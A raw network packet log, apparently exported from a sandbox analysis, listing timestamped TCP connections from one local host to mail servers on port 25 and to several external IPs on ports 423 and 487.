Sep 5, 2021 15:50:53.228774071 CEST	423	50149	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:53.241933107 CEST	25	50150	104.47.22.161	192.168.2.4
Sep 5, 2021 15:50:53.254607916 CEST	50150	25	192.168.2.4	104.47.22.161
Sep 5, 2021 15:50:53.265070915 CEST	423	50144	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:53.265165091 CEST	50144	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:53.265674114 CEST	423	50143	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:53.265733957 CEST	50143	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:53.268074036 CEST	423	50151	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:53.268170118 CEST	50151	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:53.269923925 CEST	423	50152	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:53.270010948 CEST	50152	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:53.296530962 CEST	25	50150	104.47.22.161	192.168.2.4
Sep 5, 2021 15:50:53.296869993 CEST	25	50150	104.47.22.161	192.168.2.4
Sep 5, 2021 15:50:53.304857969 CEST	50150	25	192.168.2.4	104.47.22.161
Sep 5, 2021 15:50:53.338242054 CEST	423	50151	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:53.338481903 CEST	50151	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:53.341470957 CEST	423	50152	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:53.341684103 CEST	50152	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:53.346498966 CEST	25	50150	104.47.22.161	192.168.2.4
Sep 5, 2021 15:50:53.347471952 CEST	25	50150	104.47.22.161	192.168.2.4
Sep 5, 2021 15:50:53.347676039 CEST	25	50150	104.47.22.161	192.168.2.4
Sep 5, 2021 15:50:53.347757101 CEST	50150	25	192.168.2.4	104.47.22.161
Sep 5, 2021 15:50:53.361115932 CEST	50150	25	192.168.2.4	104.47.22.161
Sep 5, 2021 15:50:53.363647938 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.363682985 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.363774061 CEST	50142	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:53.374346972 CEST	50142	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:53.375013113 CEST	50153	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:53.384807110 CEST	50146	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:53.384826899 CEST	50148	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:53.386092901 CEST	50154	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:53.386559963 CEST	50155	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:53.402693987 CEST	25	50150	104.47.22.161	192.168.2.4
Sep 5, 2021 15:50:53.408355951 CEST	423	50151	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:53.410355091 CEST	423	50148	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:53.410434008 CEST	50148	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:53.411765099 CEST	423	50155	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:53.411858082 CEST	50155	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:53.412784100 CEST	423	50152	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:53.426239967 CEST	50156	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:53.427814007 CEST	25	50142	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.437514067 CEST	423	50155	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:53.437725067 CEST	50155	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:53.442177057 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.442382097 CEST	50153	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:53.452478886 CEST	50157	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:53.454921961 CEST	423	50154	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:53.455080032 CEST	50154	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:53.462738037 CEST	423	50146	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:53.462898970 CEST	50146	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:53.462980032 CEST	50147	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:53.463504076 CEST	50158	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:53.464010000 CEST	423	50155	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:53.505011082 CEST	423	50158	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:53.505156994 CEST	50158	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:53.505667925 CEST	423	50147	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:53.505743027 CEST	50147	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:53.507112026 CEST	25	50157	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.507203102 CEST	50157	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:53.525401115 CEST	423	50154	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:53.525763035 CEST	50154	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:53.539202929 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.539527893 CEST	50153	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:53.547571898 CEST	423	50158	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:53.547902107 CEST	50158	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:53.563002110 CEST	25	50157	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.575702906 CEST	50157	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:53.588356018 CEST	25	50156	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:53.588471889 CEST	50156	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:53.588592052 CEST	423	50158	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:53.594407082 CEST	423	50154	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:53.606679916 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.628824949 CEST	25	50157	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.632108927 CEST	25	50157	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.640549898 CEST	50157	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:53.656599998 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.660486937 CEST	50153	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:53.660535097 CEST	50153	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:53.694427967 CEST	25	50157	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.697314978 CEST	50149	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:53.697834015 CEST	50159	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:53.707006931 CEST	50157	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:53.727863073 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.727906942 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.727932930 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.728404045 CEST	423	50159	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:53.728434086 CEST	423	50149	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:53.728540897 CEST	50149	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:53.729767084 CEST	50159	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:53.760746002 CEST	423	50159	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:53.760955095 CEST	50159	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:53.765003920 CEST	25	50157	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.772346020 CEST	25	50157	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.791802883 CEST	423	50159	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:53.798147917 CEST	50157	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:53.801660061 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.801923990 CEST	50153	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:53.801971912 CEST	50153	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:53.802035093 CEST	50153	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:53.802098036 CEST	50153	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:53.802180052 CEST	50153	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:53.802243948 CEST	50153	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:53.802303076 CEST	50153	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:53.802361012 CEST	50153	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:53.802417040 CEST	50153	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:53.852070093 CEST	25	50157	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.862754107 CEST	25	50156	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:53.869139910 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.869168997 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.869204044 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.869231939 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.869256020 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.869281054 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.869304895 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.869328022 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.869354010 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.879746914 CEST	50156	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:53.881874084 CEST	50157	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:53.907021046 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.907162905 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:53.907269001 CEST	50153	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:53.907542944 CEST	50153	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:53.936285019 CEST	25	50157	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.936326981 CEST	25	50157	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.936343908 CEST	25	50157	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.936367989 CEST	25	50157	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.936384916 CEST	25	50157	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:53.974647999 CEST	487	50153	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:54.042646885 CEST	25	50156	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:54.042691946 CEST	25	50156	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:54.052886009 CEST	50156	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:54.056749105 CEST	50151	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:54.057270050 CEST	50160	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:54.057270050 CEST	50152	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:54.057708025 CEST	50161	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:54.062805891 CEST	25	50157	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:54.062849045 CEST	25	50157	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:54.062906027 CEST	50157	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:54.124140978 CEST	423	50160	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:54.124281883 CEST	50160	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:54.126518011 CEST	423	50151	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:54.126538038 CEST	423	50161	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:54.126631021 CEST	50151	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:54.126761913 CEST	50161	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:54.128659964 CEST	423	50152	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:54.128761053 CEST	50152	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:54.191533089 CEST	423	50160	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:54.195854902 CEST	423	50161	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:54.215522051 CEST	25	50156	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:54.215553045 CEST	25	50156	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:54.215625048 CEST	50156	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:54.221656084 CEST	50160	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:54.221695900 CEST	50157	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:54.249033928 CEST	50161	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:54.260762930 CEST	50161	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:54.261461973 CEST	50155	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:54.264776945 CEST	50162	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:54.268762112 CEST	50163	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:54.274738073 CEST	25	50157	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:54.274924994 CEST	50156	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:54.286920071 CEST	423	50155	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:54.287008047 CEST	50155	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:54.288714886 CEST	423	50160	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:54.294905901 CEST	423	50163	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:54.295007944 CEST	50163	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:54.321468115 CEST	423	50163	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:54.321683884 CEST	50163	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:54.329951048 CEST	423	50161	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:54.342143059 CEST	487	50162	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:54.342313051 CEST	50162	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:54.347518921 CEST	423	50163	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:54.436886072 CEST	487	50162	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:54.436950922 CEST	25	50156	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:54.437310934 CEST	50162	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:54.514590979 CEST	487	50162	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:54.531755924 CEST	487	50162	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:54.535726070 CEST	50162	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:54.535813093 CEST	50162	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:54.541347980 CEST	50164	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:54.568651915 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:54.568773031 CEST	50164	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:54.580312014 CEST	50165	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:54.599339008 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:54.614322901 CEST	487	50162	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:54.636996031 CEST	50164	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:54.639005899 CEST	487	50162	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:54.639233112 CEST	50162	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:54.639364004 CEST	50162	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:54.639570951 CEST	50162	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:54.639735937 CEST	50162	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:54.639851093 CEST	50162	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:54.639899969 CEST	50162	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:54.639960051 CEST	50162	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:54.640017986 CEST	50162	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:54.665244102 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:54.666834116 CEST	50166	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:54.668962955 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:54.677452087 CEST	50164	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:54.705287933 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:54.716706038 CEST	487	50162	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:54.716978073 CEST	487	50162	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:54.717156887 CEST	487	50162	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:54.717448950 CEST	487	50162	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:54.718538046 CEST	50164	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:54.744440079 CEST	25	50165	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:54.744529009 CEST	50165	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:54.747154951 CEST	487	50162	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:54.747464895 CEST	487	50162	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:54.747554064 CEST	50162	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:54.747695923 CEST	50162	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:54.750049114 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:54.825232029 CEST	487	50162	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:54.828767061 CEST	25	50166	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:54.828875065 CEST	50166	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:54.949975014 CEST	25	50165	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:54.992234945 CEST	50165	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:55.020684958 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:55.048758984 CEST	50164	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:55.076284885 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:55.076754093 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:55.103708982 CEST	50154	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:55.103750944 CEST	50158	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:55.103859901 CEST	50164	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:55.104437113 CEST	50167	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:55.104830027 CEST	50168	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:55.106693029 CEST	25	50166	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:55.119311094 CEST	50166	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:55.131300926 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:55.131352901 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:55.131396055 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:55.131474972 CEST	50164	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:55.131501913 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:55.131613970 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:55.144754887 CEST	423	50158	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:55.144892931 CEST	50158	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:55.146605968 CEST	423	50168	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:55.146692991 CEST	50168	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:55.155225992 CEST	25	50165	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:55.155255079 CEST	25	50165	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:55.158868074 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:55.163542986 CEST	50165	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:55.172127962 CEST	423	50167	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:55.172282934 CEST	50167	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:55.172853947 CEST	423	50154	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:55.172955990 CEST	50154	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:55.188728094 CEST	423	50168	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:55.189039946 CEST	50168	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:55.208554029 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:55.208668947 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:55.208738089 CEST	50164	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:55.218427896 CEST	50164	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:55.228648901 CEST	50159	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:55.229238033 CEST	50169	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:55.229963064 CEST	50170	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:55.230660915 CEST	423	50168	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:55.242019892 CEST	423	50167	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:55.242356062 CEST	50167	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:55.245801926 CEST	25	50164	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:55.259499073 CEST	423	50159	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:55.259605885 CEST	50159	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:55.260684013 CEST	423	50169	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:55.260799885 CEST	50169	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:55.281559944 CEST	25	50166	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:55.282116890 CEST	25	50166	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:55.290695906 CEST	50166	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:55.293730974 CEST	423	50169	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:55.293941021 CEST	50169	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:55.297128916 CEST	487	50170	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:55.297254086 CEST	50170	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:55.308525085 CEST	50171	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:55.309767962 CEST	423	50167	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:55.326387882 CEST	423	50169	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:55.326900959 CEST	25	50165	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:55.327011108 CEST	25	50165	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:55.327069998 CEST	50165	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:55.341073990 CEST	50165	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:55.353672981 CEST	50160	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:55.363251925 CEST	25	50171	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:55.363387108 CEST	50171	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:55.384367943 CEST	487	50170	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:55.418430090 CEST	25	50171	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:55.422405958 CEST	423	50160	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:55.422509909 CEST	50160	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:55.453779936 CEST	25	50166	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:55.453835011 CEST	25	50166	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:55.453998089 CEST	50166	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:55.478718996 CEST	50170	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:55.478734970 CEST	50171	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:55.505377054 CEST	25	50165	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:55.691699028 CEST	50170	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:55.724796057 CEST	50172	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:55.735958099 CEST	50166	25	192.168.2.4	67.195.228.106
Sep 5, 2021 15:50:55.761490107 CEST	487	50170	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:55.769599915 CEST	50171	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:55.799442053 CEST	423	50172	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:55.799597979 CEST	50172	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:55.801523924 CEST	50173	25	192.168.2.4	18.185.115.251
Sep 5, 2021 15:50:55.806704998 CEST	487	50170	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:55.810471058 CEST	50170	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:55.810558081 CEST	50170	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:55.821413040 CEST	25	50173	18.185.115.251	192.168.2.4
Sep 5, 2021 15:50:55.821511030 CEST	50173	25	192.168.2.4	18.185.115.251
Sep 5, 2021 15:50:55.823304892 CEST	25	50171	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:55.827299118 CEST	25	50171	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:55.835750103 CEST	50171	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:55.838215113 CEST	50161	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:55.838244915 CEST	50163	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:55.839031935 CEST	50174	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:55.839730024 CEST	50175	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:55.859337091 CEST	50176	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:55.859433889 CEST	25	50173	18.185.115.251	192.168.2.4
Sep 5, 2021 15:50:55.867372990 CEST	423	50163	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:55.867425919 CEST	423	50175	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:55.867482901 CEST	50163	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:55.867525101 CEST	50175	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:55.872320890 CEST	50173	25	192.168.2.4	18.185.115.251
Sep 5, 2021 15:50:55.875320911 CEST	423	50172	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:55.875507116 CEST	50172	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:55.877953053 CEST	487	50170	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:55.877983093 CEST	487	50170	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:55.878006935 CEST	487	50170	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:55.879321098 CEST	487	50170	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:55.879353046 CEST	487	50170	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:55.891470909 CEST	25	50171	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:55.895437002 CEST	25	50173	18.185.115.251	192.168.2.4
Sep 5, 2021 15:50:55.895483971 CEST	25	50173	18.185.115.251	192.168.2.4
Sep 5, 2021 15:50:55.898055077 CEST	487	50170	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:55.898088932 CEST	423	50175	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:55.898117065 CEST	25	50166	67.195.228.106	192.168.2.4
Sep 5, 2021 15:50:55.903774023 CEST	50173	25	192.168.2.4	18.185.115.251
Sep 5, 2021 15:50:55.903942108 CEST	50170	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:55.904046059 CEST	50170	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:55.904104948 CEST	50170	487	192.168.2.4	193.56.146.188
